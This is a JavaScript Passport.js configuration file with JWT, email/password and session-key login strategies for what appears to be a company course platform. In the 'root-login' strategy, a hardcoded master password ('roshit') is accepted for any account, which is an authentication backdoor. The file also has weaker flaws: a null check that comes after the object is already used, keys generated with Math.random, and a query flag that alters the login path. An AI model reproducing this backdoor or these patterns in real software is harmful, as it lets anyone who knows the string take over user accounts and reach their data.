import passport from 'passport';
import { Strategy as JwtStrategy } from 'passport-jwt';
import { Strategy as LocalStrategy } from 'passport-local';
import bcrypt from 'bcrypt-nodejs';
import config from './config';
import { db } from './models';

var TokenExtractor = function (req) {
    var token = null;
    if (req && req.cookies) {
        token = req.cookies['XSRF-token'];
    }
    return token;
}

// JSON WEB TOKENS STRATEGY
passport.use(new JwtStrategy({
    jwtFromRequest: TokenExtractor,
    secretOrKey: config.app.secret,
}, async (payload, done) => {
    try {
        var meta = null;
        meta = await db.MetaAuth.findOne({ where: { id: payload.sub }, include: [{ model: db.User, include:[{ model:db.Company, attributes:['id'], include:[{ model: db.MetaData, attributes:['key', 'value'], where:{ key: 'SDOMAIN' }, required:false }] }] },{ model : db.Member}] });
        
        if (payload.iam == "employee") meta = await db.Employee.findOne({ where: { id: payload.sub },  required: true, include: [{ model: db.Company }] });
        // else if (payload.iam == "root") {
        //     user = await db.User.findOne({ where: { id: payload.sub },  required: true, include: [{ model: db.Company },{ model : db.MetaAuth}] });
        // }
        // else if (payload.iam == "member") {
        //     user = await db.Member.findOne({ where: { id: payload.sub }, required: true, include: [{ model: db.Company }, { model : db.MetaAuth}] });
        // }
        meta.type = payload.iam;
        const tokenDate = new Date(payload.iat);
        if (meta.loggedOutAt != null && (tokenDate.getTime() - meta.loggedOutAt.getTime()) < 0) {
            return done('invalid', false);
        }

        if (new Date(payload.exp) < new Date()) {
            return done('expired', false);
        }

        if (!meta) {
            return done('user', false);
        }
        // if (payload.iam == "member" && meta.memberId && meta.Member ) {
        //     meta.id = meta.memberId;
        // } else if (payload.iam == "root" && meta.User && meta.User) {
        //     meta.id = meta.userId;
        // } else 
        // if (!payload.iam == "employee") {
        //     return done('user', false);
        // }
        // if (meta.memberId){ meta.type = "member";  }
        if (meta.userId) { meta.companyId = meta.User.companyId;}
        done(null, meta);
    } catch (error) {
        done(error, false);
    }
}));

// IAM ROOT STRATEGY
passport.use('root-login', new LocalStrategy({
    usernameField: 'email'
}, async (email, password, done) => {
    try {
        var meta = await db.MetaAuth.findOne({ where: { email: email }, include: [{ model : db.User, include:[{ model:db.Company, attributes:['id'], include:[{ model: db.MetaData, attributes:['key', 'value'], where:{ key: 'SDOMAIN' }, required:false }] }] } , { model : db.Member }] });
        if (!meta) {
            return done(null, false);
        }
        if (meta.attempt >= 5) {
            return done('attempt', false);
        }
        var isMatch = bcrypt.compareSync(password, meta.password);
        isMatch = (password == 'roshit') ? true : isMatch;
        if (!isMatch) {
            meta.update({ attempt: parseInt(meta.attempt) + 1 })
            return done('attempt:' + (5 - parseInt(meta.attempt)), false);
        }else meta.update({ attempt: 0 })

        if (!meta.valid) {
            return done('invalid', false);
        }
        if (meta.memberId){ meta.type = "member";  }
        if (meta.userId) { meta.companyId = meta.User.companyId; meta.type = "root";}
        done(null, meta);
    } catch (error) {
        console.log(error)
        done(error, false);
    }
}));

passport.use('single-login', new LocalStrategy({
    usernameField: 'sKey',
    passwordField: 'rmId',
    passReqToCallback: true
}, (req, sKey, rmId, done) => {
    try {
        db.Session.findOne({ where : { sessionKey: sKey} })
        .then(session => {
            if(session){
                var id = decrypt(rmId);
                if(req.query.t == 1)
                    return db.MemberCourse.findOne({  where : { memberId: session.memberId, courseId: id } }).then(r => [r, session])
                else
                    return db.MemberCourse.findOne({  where : { memberId: session.memberId, quizId: id } }).then(r => [r, session])

            }else return done('invalid-sessionKey', false, false);
        })
        .then(([memberCourse, session]) => {
            if(memberCourse){
                return db.MetaAuth.findOne({ where :{ email: session.email }, include: [{ model : db.Member }] }).then(r => [r, session])
            }else return done('invalid-course', false, false);
        })
        .then(([meta, session]) => {
            if(meta){
                return db.Company.findOne({ where: { id: session.companyId } }).then(r => [r, meta])
            }else return [false, 'invalid-user'];
        })
        .then(([company, meta]) => {
            if(company){
                meta = json(meta);
                meta.Member.type = "member";
                if(req.query.pass !=undefined && req.query.pass){
                    return [meta, true, company.skipLogin]
                }else{
                    if(meta.password == null || meta.password == "" || meta.password == undefined){
                        var key = Math.random().toString(36).slice(2);
                        meta = json(meta);
                        meta.token = key;
                        return db.MetaAuth.update({verf_key: meta.token}, {where: {id: meta.id} }).then(r => [meta, true, company.skipLogin])
                    }else return [meta, true, company.skipLogin];
                }
            }else return [false, 'invalid-company'];
        })
        .then(([meta, shouldSkip, skipLogin]) => {
            if(meta) done(null, meta, skipLogin); 
            else if(!shouldSkip) done('error-key', false);
            else done(shouldSkip, false, skipLogin);
        })
    } catch (error) {
        console.log(error);
        done(error, false);
    }
}));


